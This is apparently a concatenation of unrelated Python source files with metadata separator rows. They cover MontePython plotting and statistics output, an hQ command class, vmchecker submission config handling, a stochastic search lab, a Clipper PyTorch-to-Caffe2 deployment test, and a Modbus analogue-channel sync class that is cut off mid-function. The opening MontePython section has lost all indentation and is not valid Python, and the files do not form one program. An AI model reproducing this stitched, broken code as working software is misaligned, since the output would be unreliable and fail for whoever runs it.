# Recovering all x_range and ticks entries from the concerned information
# instances
x_ranges = []
ticks = []
for info in information_instances:
if not info.ignore_param:
x_ranges.append(info.x_range[info.native_index])
ticks.append(info.ticks[info.native_index])
# The new x_range and tick should min/max all the existing ones
new_x_range = np.array(
[min([e[0] for e in x_ranges]), max([e[1] for e in x_ranges])])
temp_ticks = np.array(
[min([e[0] for e in ticks]), max([e[-1] for e in ticks])])
new_ticks = np.linspace(temp_ticks[0],
temp_ticks[1],
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = new_x_range
info.ticks[info.native_index] = new_ticks
def store_contour_coordinates(info, name1, name2, contours):
"""docstring"""
file_name = os.path.join(
info.folder, 'plots', '{0}_2d_{1}-{2}.dat'.format(
info.basename, name1, name2))
with open(file_name, 'w') as plot_file:
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[1]))
for elem in contours.collections[0].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
# stop to not include the inner contours
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[0]))
for elem in contours.collections[1].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
def iscomment(s):
"""
Define what we call a comment in MontePython chain files
"""
return s.startswith('#')
class Information(object):
"""
Hold all information for analyzing runs
"""
# Counting the number of instances, to choose the color map
_ids = count(0)
# Flag checking the absence or presence of the interp1d function
has_interpolate_module = False
# Actual pairs of colors used by MP.
# For each pair, the first color is for the 95% contour,
# and the second for the 68% contour + the 1d probability.
# Note that, as with the other customisation options, you can specify new
# values for this in the extra plot_file.
MP_color = {
'Red':['#E37C80','#CE121F'],
'Blue':['#7A98F6','#1157EF'],
'Green':['#88B27A','#297C09'],
'Orange':['#F3BE82','#ED920F'],
'Grey':['#ABABAB','#737373'],
'Purple':['#B87294','#88004C']
}
# order used when several directories are analysed
MP_color_cycle = [
MP_color['Red'],
MP_color['Blue'],
MP_color['Green'],
MP_color['Orange'],
MP_color['Grey'],
MP_color['Purple']
]
# in the same order, list of transparency levels
alphas = [0.9, 0.9, 0.9, 0.9, 0.9, 0.9]
def __init__(self, command_line, other=None):
"""
The following initialization creates the three tables that can be
customized in an extra plot_file (see :mod:`parser_mp`).
Parameters
----------
command_line : Namespace
it contains the initialised command line arguments
"""
self.to_change = {}
"""
Dictionary whose keys are the old parameter names, and values are the
new ones. For instance :code:`{'beta_plus_lambda':'beta+lambda'}`
"""
self.to_plot = []
"""
Array of names of parameters to plot. If left empty, all will be
plotted.
.. warning::
If you changed a parameter name with :attr:`to_change`, you need to
give the new name to this array
"""
self.new_scales = {}
"""
Dictionary that redefines some scales. The keys will be the parameter
name, and the value its scale.
"""
# Assign a unique id to this instance
self.id = self._ids.next()
# Defining the sigma contours (1, 2 and 3-sigma)
self.levels = np.array([68.26, 95.4, 99.7])/100.
# Follows a bunch of initialisation to provide default members
self.ref_names, self.backup_names = [], []
self.scales, self.plotted_parameters = [], []
self.spam = []
# Store directly all information from the command_line object into this
# instance, except the protected members (begin and end with __)
for elem in dir(command_line):
if elem.find('__') == -1:
setattr(self, elem, getattr(command_line, elem))
# initialise the legend flags
self.plot_legend_1d = None
self.plot_legend_2d = None
# initialize the legend size to be the same as fontsize, but can be
# altered in the extra file
self.legendsize = self.fontsize
self.legendnames = []
# initialize the customisation script flags
self.custom1d = []
self.custom2d = []
# initialise the dictionary enmforcing limit
self.force_limits = {}
# Read a potential file describing changes to be done for the parameter
# names, and number of paramaters plotted (can be let empty, all will
# then be plotted), but also the style of the plot. Note that this
# overrides the command line options
if command_line.optional_plot_file:
plot_file_vars = {'info': self,'plt': plt}
execfile(command_line.optional_plot_file, plot_file_vars)
# check and store keep_fraction
if command_line.keep_fraction<=0 or command_line.keep_fraction>1:
raise io_mp.AnalyzeError("after --keep-fraction you should pass a float >0 and <=1")
self.keep_fraction = command_line.keep_fraction
def remap_parameters(self, spam):
"""
Perform substitutions of parameters for analyzing
.. note::
for arbitrary combinations of parameters, the prior will not
necessarily be flat.
"""
if hasattr(self, 'redefine'):
for key, value in self.redefine.iteritems():
# Check that the key was an original name
if key in self.backup_names:
print ' /|\ Transforming', key, 'into', value
# We recover the indices of the key
index_to_change = self.backup_names.index(key)+2
print('/_o_\ The new variable will be called ' +
self.ref_names[self.backup_names.index(key)])
# Recover all indices of all variables present in the
# remapping
variable_names = [elem for elem in self.backup_names if
value.find(elem) != -1]
indices = [self.backup_names.index(name)+2 for name in
variable_names]
# Now loop over all files in spam
for i in xrange(len(spam)):
# Assign variables to their values
for index, name in zip(indices, variable_names):
exec("%s = spam[i][:, %i]" % (name, index))
# Assign to the desired index the combination
exec("spam[i][:, %i] = %s" % (index_to_change, value))
def define_ticks(self):
"""
"""
self.max_values = self.chain[:, 2:].max(axis=0)
self.min_values = self.chain[:, 2:].min(axis=0)
self.span = (self.max_values-self.min_values)
# Define the place of ticks, given the number of ticks desired, stored
# in conf.ticknumber
self.ticks = np.array(
[np.linspace(self.min_values[i]+self.span[i]*0.1,
self.max_values[i]-self.span[i]*0.1,
self.ticknumber) for i in range(len(self.span))])
# Define the x range (ticks start not exactly at the range boundary to
# avoid display issues)
self.x_range = np.array((self.min_values, self.max_values)).T
# In case the exploration hit a boundary (as defined in the parameter
# file), at the level of precision defined by the number of bins, the
# ticks and x_range should be altered in order to display this
# meaningful number instead.
for i in range(np.shape(self.ticks)[0]):
x_range = self.x_range[i]
bounds = self.boundaries[i]
# Left boundary
if bounds[0] is not None:
if abs(x_range[0]-bounds[0]) < self.span[i]/self.bins:
self.ticks[i][0] = bounds[0]
self.x_range[i][0] = bounds[0]
# Right boundary
if bounds[-1] is not None:
if abs(x_range[-1]-bounds[-1]) < self.span[i]/self.bins:
self.ticks[i][-1] = bounds[-1]
self.x_range[i][-1] = bounds[-1]
def write_information_files(self):
# Store in info_names only the tex_names that were plotted, for this
# instance, and in indices the corresponding list of indices. It also
# removes the $ signs, for clarity
self.info_names = [
name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.indices = [self.tex_names.index(name) for name in self.info_names]
self.tex_names = [name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.info_names = [name.replace('$', '') for name in self.info_names]
# Define the bestfit array
self.bestfit = np.zeros(len(self.ref_names))
for i in xrange(len(self.ref_names)):
self.bestfit[i] = self.chain[self.sorted_indices[0], :][2+i]
# Write down to the .h_info file all necessary information
self.write_h_info()
self.write_v_info()
self.write_tex()
def write_h_info(self):
with open(self.h_info_path, 'w') as h_info:
h_info.write(' param names\t: ')
for name in self.info_names:
h_info.write("%-14s" % name)
write_h(h_info, self.indices, 'R-1 values', '% .6f', self.R)
write_h(h_info, self.indices, 'Best Fit ', '% .6e', self.bestfit)
write_h(h_info, self.indices, 'mean ', '% .6e', self.mean)
write_h(h_info, self.indices, 'sigma ', '% .6e',
(self.bounds[:, 0, 1]-self.bounds[:, 0, 0])/2.)
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma - ', '% .6e',
self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma + ', '% .6e',
self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma - ', '% .6e',
self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma + ', '% .6e',
self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma - ', '% .6e',
self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma + ', '% .6e',
self.bounds[:, 2, 1])
# bounds
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma > ', '% .6e',
self.mean+self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma < ', '% .6e',
self.mean+self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma > ', '% .6e',
self.mean+self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma < ', '% .6e',
self.mean+self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma > ', '% .6e',
self.mean+self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma < ', '% .6e',
self.mean+self.bounds[:, 2, 1])
def write_v_info(self):
"""Write vertical info file"""
with open(self.v_info_path, 'w') as v_info:
v_info.write('%-15s\t: %-11s' % ('param names', 'R-1'))
v_info.write(' '.join(['%-11s' % elem for elem in [
'Best fit', 'mean', 'sigma', '1-sigma -', '1-sigma +',
'2-sigma -', '2-sigma +', '1-sigma >', '1-sigma <',
'2-sigma >', '2-sigma <']]))
for index, name in zip(self.indices, self.info_names):
v_info.write('\n%-15s\t: % .4e' % (name, self.R[index]))
v_info.write(' '.join(['% .4e' % elem for elem in [
self.bestfit[index], self.mean[index],
(self.bounds[index, 0, 1]-self.bounds[index, 0, 0])/2.,
self.bounds[index, 0, 0], self.bounds[index, 0, 1],
self.bounds[index, 1, 0], self.bounds[index, 1, 1],
self.mean[index]+self.bounds[index, 0, 0],
self.mean[index]+self.bounds[index, 0, 1],
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]]]))
def write_tex(self):
"""Write a tex table containing the main results """
with open(self.tex_path, 'w') as tex:
tex.write("\\begin{tabular}{|l|c|c|c|c|} \n \\hline \n")
tex.write("Param & best-fit & mean$\pm\sigma$ ")
tex.write("& 95\% lower & 95\% upper \\\\ \\hline \n")
for index, name in zip(self.indices, self.tex_names):
tex.write("%s &" % name)
tex.write("$%.4g$ & $%.4g_{%.2g}^{+%.2g}$ " % (
self.bestfit[index], self.mean[index],
self.bounds[index, 0, 0], self.bounds[index, 0, 1]))
tex.write("& $%.4g$ & $%.4g$ \\\\ \n" % (
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]))
tex.write("\\hline \n \\end{tabular} \\\\ \n")
tex.write("$-\ln{\cal L}_\mathrm{min} =%.6g$, " % (
self.min_minus_lkl))
tex.write("minimum $\chi^2=%.4g$ \\\\ \n" % (
self.min_minus_lkl*2.))
| mit | 3,279,992,004,840,234,500 | 43.253259 | 153 | 0.52346 | false |
call-me-jimi/hq | hq/lib/hQCommand.py | 1 | 1329 | import re
class hQCommand( object ):
"""! @brief Command """
def __init__( self,
name,
regExp,
arguments = [],
permission = None,
fct = None,
help = "",
fullhelp = "" ):
self.name = name
self.arguments = arguments
self.re = re.compile(regExp)
self.permission = permission
self.fct = fct
self.help = help
self.fullhelp = fullhelp
def match( self, command_str ):
"""! @brief match regExp agains command_str """
return self.re.match( command_str )
def groups( self, command_str ):
"""! @brief return groups in regular expression """
match = self.re.match( command_str )
if match:
return match.groups()
else:
return None
def get_command_str( self ):
"""! @brief return command string """
s = self.name
for a in self.arguments:
s += ":<{A}>".format(A=a.upper())
return s
def get_fullhelp( self ):
"""! @brief return fullhelp or, if not given, help """
if self.fullhelp:
return self.fullhelp
else:
return self.help
| gpl-2.0 | 594,055,388,762,925,400 | 24.075472 | 62 | 0.470278 | false |
cojocar/vmchecker | vmchecker/submissions.py | 1 | 4960 | #! /bin/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import with_statement
import ConfigParser
import os
import time
import datetime
import logging
from .config import DATE_FORMAT
from . import paths
_logger = logging.getLogger('vmchecker.submissions')
def get_time_struct_from_str(time_str):
"""Returns a time_struct object from the time_str string given"""
time_struct = time.strptime(time_str, DATE_FORMAT)
return time_struct
def get_datetime_from_time_struct(time_struct):
"""Returns a datetime object from time time_struct given"""
return datetime.datetime(*time_struct[:6])
class Submissions:
"""A class to manipulate submissions from a given repository"""
def __init__(self, vmpaths):
"""Create a Submissions class. vmpaths is a
vmchecker.paths.VmcheckerPaths object holding information
about one course configuration."""
self.vmpaths = vmpaths
def _get_submission_config_fname(self, assignment, user):
"""Returns the last submissions's configuration file name for
the given user for the given assignment.
If the config file cannot be found, returns None.
"""
sbroot = self.vmpaths.dir_cur_submission_root(assignment, user)
if not os.path.isdir(sbroot):
return None
config_file = paths.submission_config_file(sbroot)
if not os.path.isfile(config_file):
_logger.warn('%s found, but config (%s) is missing',
sbroot, config_file)
return None
return config_file
def _get_submission_config(self, assignment, user):
"""Returns a ConfigParser for the last submissions's
configuration file name for the given user for the given
assignment.
If the config file cannot be found, returns None.
"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
return hrc
def get_upload_time_str(self, assignment, user):
"""Returns a string representing the user's last submission date"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
return hrc.get('Assignment', 'UploadTime')
def get_eval_queueing_time_str(self, assignment, user):
"""Returns a string representing the last time the submission
was queued for evaluation"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
if not hrc.has_option('Assignment', 'EvaluationQueueingTime'):
return None
return hrc.get('Assignment', 'EvaluationQueueingTime')
def get_upload_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
user's last submission"""
upload_time_str = self.get_upload_time_str(assignment, user)
return get_time_struct_from_str(upload_time_str)
def get_upload_time(self, assignment, user):
"""Returns a datetime object with the upload time of the
user's last submission"""
upload_time_struct = self.get_upload_time_struct(assignment, user)
return get_datetime_from_time_struct(upload_time_struct)
def get_eval_queueing_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
last evaluation queueing for the user's last submission"""
time_str = self.get_eval_queueing_time_str(assignment, user)
return get_time_struct_from_str(time_str)
def get_eval_queueing_time(self, assignment, user):
"""Returns a datetime object with the upload time of the last
evaluation queueing for the user's last submission"""
time_struct = self.get_eval_queueing_time_struct(assignment, user)
return get_datetime_from_time_struct(time_struct)
def set_eval_parameters(self, assignment, user, archive, eval_time):
"""Appends the archive filename to an existing
submission-config (used for Large type assignments)"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
hrc.set('Assignment', 'ArchiveFilename', archive)
hrc.set('Assignment', 'EvaluationQueueingTime', eval_time)
with open(config_file, "w") as handler:
hrc.write(handler)
def submission_exists(self, assignment, user):
"""Returns true if a valid submission exists for the given
user and assignment"""
return (self._get_submission_config(assignment, user) != None)
| mit | -8,193,271,641,474,638,000 | 32.513514 | 75 | 0.653831 | false |
budnyjj/bsuir_magistracy | disciplines/OTOS/lab_1/lab.py | 1 | 1813 | #!/usr/bin/env python
import functools
import math
import random
import numpy as np
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# 1D model
def model(x):
a = 2.7; d = 0.1; y_0 = 2
sigma = 0.001
result = y_0 - 0.04 * (x - a) - d * (x - a)**2
return result + random.gauss(0, sigma)
def search_asymmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
def search_symmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x - alpha))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
NUM_ITER = 1000
MIN_X = 1; MAX_X = 10; NUM_X = 100
VALS_X = np.linspace(MIN_X, MAX_X, NUM_X)
model_vec = np.vectorize(model)
plt.plot(VALS_X, model_vec(VALS_X),
color='r', linestyle=' ',
marker='.', markersize=5,
label='model')
search_asymmetric_x = search_asymmetric(model, MAX_X, NUM_ITER)
plt.plot(search_asymmetric_x, model_vec(search_asymmetric_x),
color='g', marker='x', markersize=5,
label='asymmetric')
search_symmetric_x = search_symmetric(model, MAX_X, NUM_ITER)
plt.plot(search_symmetric_x, model_vec(search_symmetric_x),
color='b', marker='x', markersize=5,
label='symmetric')
plt.xlabel('$ x $')
plt.ylabel('$ y $')
plt.grid(True)
# plt.legend(loc=2)
plt.savefig('plot.png', dpi=200)
| gpl-3.0 | 7,770,229,010,586,717,000 | 24.9 | 79 | 0.578047 | false |
ucbrise/clipper | integration-tests/deploy_pytorch_to_caffe2_with_onnx.py | 1 | 7042 | from __future__ import absolute_import, print_function
import os
import sys
import requests
import json
import numpy as np
import time
import logging
cur_dir = os.path.dirname(os.path.abspath(__file__))
import torch
import torch.utils.data as data
from torch import nn, optim
from torch.autograd import Variable
import torch.nn.functional as F
from test_utils import (create_docker_connection, BenchmarkException, headers,
log_clipper_state)
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath("%s/../clipper_admin" % cur_dir))
from clipper_admin.deployers.onnx import deploy_pytorch_model, create_pytorch_endpoint
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
app_name = "caffe2-test"
model_name = "caffe2-model"
def normalize(x):
return x.astype(np.double) / 255.0
def objective(y, pos_label):
# prediction objective
if y == pos_label:
return 1
else:
return 0
def parsedata(train_path, pos_label):
trainData = np.genfromtxt(train_path, delimiter=',', dtype=int)
records = trainData[:, 1:]
labels = trainData[:, :1]
transformedlabels = [objective(ele, pos_label) for ele in labels]
return (records, transformedlabels)
def predict(model, inputs):
preds = model.run(np.array(inputs).astype(np.float32))
return [str(p) for p in preds[0]]
def deploy_and_test_model(clipper_conn,
model,
inputs,
version,
link_model=False,
predict_fn=predict):
deploy_pytorch_model(
clipper_conn,
model_name,
version,
"integers",
inputs,
predict_fn,
model,
onnx_backend="caffe2")
time.sleep(5)
if link_model:
clipper_conn.link_model_to_app(app_name, model_name)
time.sleep(5)
test_model(clipper_conn, app_name, version)
def test_model(clipper_conn, app, version):
time.sleep(25)
num_preds = 25
num_defaults = 0
addr = clipper_conn.get_query_addr()
for i in range(num_preds):
response = requests.post(
"http://%s/%s/predict" % (addr, app),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code == requests.codes.ok and result["default"]:
num_defaults += 1
elif response.status_code != requests.codes.ok:
logger.error(result)
raise BenchmarkException(response.text)
if num_defaults > 0:
logger.error("Error: %d/%d predictions were default" % (num_defaults,
num_preds))
if num_defaults > num_preds / 2:
raise BenchmarkException("Error querying APP %s, MODEL %s:%d" %
(app, model_name, version))
# Define a simple NN model
class BasicNN(nn.Module):
def __init__(self):
super(BasicNN, self).__init__()
self.net = nn.Linear(28 * 28, 2)
def forward(self, x):
if isinstance(x, np.ndarray):
x = torch.from_numpy(x)
x = x.float()
if isinstance(x, type(torch.randn(1))):
x = Variable(x)
x = x.view(1, 1, 28, 28)
x = x / 255.0
batch_size = x.size(0)
x = x.view(batch_size, -1)
output = self.net(x.float())
return F.softmax(output)
def train(model):
model.train()
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(10):
for i, d in enumerate(train_loader, 1):
image, j = d
optimizer.zero_grad()
output = model(image)
loss = F.cross_entropy(output,
Variable(
torch.LongTensor([train_y[i - 1]])))
loss.backward()
optimizer.step()
return model
def get_test_point():
return [np.random.randint(255) for _ in range(784)]
# Define a dataloader to read data
class TrainingDataset(data.Dataset):
def __init__(self, data, label):
self.imgs = data
self.classes = label
def __getitem__(self, index):
img = self.imgs[index]
label = self.classes[index]
img = torch.Tensor(img)
return img, torch.Tensor(label)
if __name__ == "__main__":
pos_label = 3
import random
cluster_name = "onnx-{}".format(random.randint(0, 5000))
try:
clipper_conn = create_docker_connection(
cleanup=False, start_clipper=True, new_name=cluster_name)
train_path = os.path.join(cur_dir, "data/train.data")
train_x, train_y = parsedata(train_path, pos_label)
train_x = normalize(train_x)
train_loader = TrainingDataset(train_x, train_y)
try:
clipper_conn.register_application(app_name, "integers",
"default_pred", 100000)
time.sleep(1)
addr = clipper_conn.get_query_addr()
response = requests.post(
"http://%s/%s/predict" % (addr, app_name),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code != requests.codes.ok:
logger.error("Error: %s" % response.text)
raise BenchmarkException("Error creating app %s" % app_name)
version = 1
model = BasicNN()
nn_model = train(model)
inputs = Variable(torch.randn(len(get_test_point())))
deploy_and_test_model(
clipper_conn, nn_model, inputs, version, link_model=True)
app_and_model_name = "easy-register-app-model"
create_pytorch_endpoint(
clipper_conn,
app_and_model_name,
"integers",
inputs,
predict,
nn_model,
onnx_backend="caffe2")
test_model(clipper_conn, app_and_model_name, 1)
except BenchmarkException:
sys.exit(1)
log_clipper_state(clipper_conn)
logger.exception("BenchmarkException")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
else:
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
except Exception:
logger.exception("Exception")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
| apache-2.0 | 3,313,663,111,982,408,000 | 29.484848 | 86 | 0.557938 | false |
dcneeme/droidcontroller | achannels.py | 1 | 26311 | # to be imported to access modbus registers as analogue io
# 03.04.2014 neeme
# 04.04.2014 it works, without periodical executuoin and without acces by svc reg
# 06.04.2014 seguential register read for optimized reading, done
# 14.04.2014 mb[mbi] (multiple modbus connections) support. NOT READY!
# 16.04.2014 fixed mts problem, service messaging ok
from sqlgeneral import * # SQLgeneral / vaja ka time,mb, conn jne
s=SQLgeneral() # sql connection
class Achannels(SQLgeneral): # handles aichannels and aochannels tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'aichannels.sql', out_sql = 'aochannels.sql', readperiod = 10, sendperiod = 30): # period for mb reading, renotify for udpsend
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.out_sql = out_sql.split('.')[0]
self.s = SQLgeneral()
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.sendperiod = invar
def sqlread(self,table):
self.s.sqlread(table) # read dichannels
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -150 # time of last reporting
self.sqlread(self.in_sql) # read aichannels
self.sqlread(self.out_sql) # read aochannels if exist
def read_ai_grp(self,mba,regadd,count,mbi=0): # using self,in_sql as the table to store in. mbi - modbus channel index
''' Read sequential register group and store raw into table self.in_sql. Inside transaction! '''
msg='reading data for aichannels group from mbi '+str(mbi)+', mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)
#print(msg) # debug
if count>0 and mba<>0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
else:
print('invalid parameters for read_ai_grp()!',mba,regadd,count)
return 2
if result != None:
try:
for i in range(count): # tuple to table rows. tuple len is twice count!
Cmd="UPDATE "+self.in_sql+" set raw='"+str(result[i])+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and mbi="+str(mbi)+" and regadd='"+str(regadd+i)+"'" # koigile korraga
#print(Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='ai grp data reading FAILED!'
print(msg)
return 1
def sync_ai(self): # analogue input readings to sqlite, to be executed regularly.
#global MBerr
mba=0
val_reg=''
mcount=0
block=0 # vigade arv
#self.ts = time.time()
ts_created=self.ts # selle loeme teenuse ajamargiks
value=0
ovalue=0
Cmd = ''
Cmd3= ''
cur = conn.cursor()
cur3 = conn.cursor()
bfirst=0
blast=0
bmba=0
bmbi=0
bcount=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # hoiab kinni kuni mb suhtlus kestab? teised seda ei kasuta samal ajal nagunii. iga tabel omaette.
conn.execute(Cmd)
#self.conn.execute(Cmd)
Cmd="select mba,regadd,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur:
mbi=int(row[2]) # niigi num
mba=int(row[0])
regadd=int(row[1])
if bfirst == 0:
bfirst = regadd
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst,'mbi',mbi) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+1: # sequential group still growing
blast = regadd
bcount=bcount+1
#print('ai group end shifted to',blast) # debug
else: # a new group started, make a query for previous
#print('ai group end detected at regadd',blast,'bcount',bcount) # debugb
#print('going to read ai registers from',bmbi,bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('ai group end detected at regadd',blast) # debugb
#print('going to read ai registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table
# raw updated for all aichannels
# now process raw -> value, by services. x1 x2 y1 y may be different even if the same mba regadd in use. DO NOT calculate status here, happens separately.
Cmd="select val_reg from "+self.in_sql+" where mba<>'' and regadd<>'' group by val_reg" # service list. other
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur: # services
status=0 # esialgu, aga selle jaoks vaja iga teenuse jaoks oma tsykkel.
val_reg=row[0] # teenuse nimi
Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' and mba<>'' and regadd<>'' order by member" # loeme yhe teenuse kogu info
cur3.execute(Cmd3) # another cursor to read the same table
for srow in cur3: # value from raw and also status
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
ostatus=0 # eelmine
#tvalue=0 # test, vordlus
raw=0
ovalue=0 # previous (possibly averaged) value
ots=0 # eelmine ts value ja status ja raw oma
avg=0 # keskmistamistegur, mojub alates 2
desc=''
comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # "+self.in_sql+"
if srow[0] != '':
mba=int(srow[0]) # must be int! will be -1 if empty (setpoints)
if srow[1] != '':
regadd=int(srow[1]) # must be int! will be -1 if empty
val_reg=srow[2] # see on string
if srow[3] != '':
member=int(srow[3])
if srow[4] != '':
cfg=int(srow[4]) # konfibait nii ind kui grp korraga, esita hex kujul hiljem
if srow[5] != '':
x1=int(srow[5])
if srow[6] != '':
x2=int(srow[6])
if srow[7] != '':
y1=int(srow[7])
if srow[8] != '':
y2=int(srow[8])
#if srow[9] != '':
# outlo=int(srow[9])
#if srow[10] != '':
# outhi=int(srow[10])
if srow[11] != '':
avg=int(srow[11]) # averaging strength, values 0 and 1 do not average!
if srow[12] != '': # block - loendame siin vigu, kui kasvab yle 3? siis enam ei saada
block=int(srow[12]) #
if srow[13] != '': #
raw=int(srow[13])
if srow[14] != '':
ovalue=eval(srow[14]) # ovalue=int(srow[14])
#if srow[15] != '':
# ostatus=int(srow[15])
if srow[16] != '':
ots=eval(srow[16])
#desc=srow[17]
#comment=srow[18]
#jargmise asemel vt pid interpolate
if x1 != x2 and y1 != y2: # konf normaalne
value=(raw-x1)*(y2-y1)/(x2-x1) # lineaarteisendus
value=y1+value
msg=val_reg
#print 'raw',raw,', value',value, # debug
if avg>1 and abs(value-ovalue)<value/2: # keskmistame, hype ei ole suur
#if avg>1: # lugemite keskmistamine vajalik, kusjures vaartuse voib ju ka komaga sailitada!
value=((avg-1)*ovalue+value)/avg # averaging
msg=msg+', averaged '+str(int(value))
else: # no averaging for big jumps
msg=msg+', nonavg value '+str(int(value))
else:
print("val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'value not used!')
value=0
status=3 # not to be sent status=3! or send member as NaN?
print(msg) # temporarely off SIIN YTLEB RAW LUGEMI AI jaoks
#print 'status for AI val_reg, member',val_reg,member,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi # debug
#"+self.in_sql+" update with new value and sdatus
Cmd="UPDATE "+self.in_sql+" set status='"+str(status)+"', value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"' and mbi='"+str(mbi)+"'" # meelde
#print Cmd
conn.execute(Cmd)
conn.commit()
#self.conn.commit() # "+self.in_sql+" transaction end
return 0
except:
msg='PROBLEM with '+self.in_sql+' reading or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def sync_ao(self): # synchronizes AI registers with data in aochannels table
#print('write_aochannels start') # debug
# and use write_register() write modbus registers to get the desired result (all ao channels must be also defined in aichannels table!)
respcode=0
mba=0
omba=0 # previous value
val_reg=''
desc=''
value=0
word=0 # 16 bit register value
#comment=''
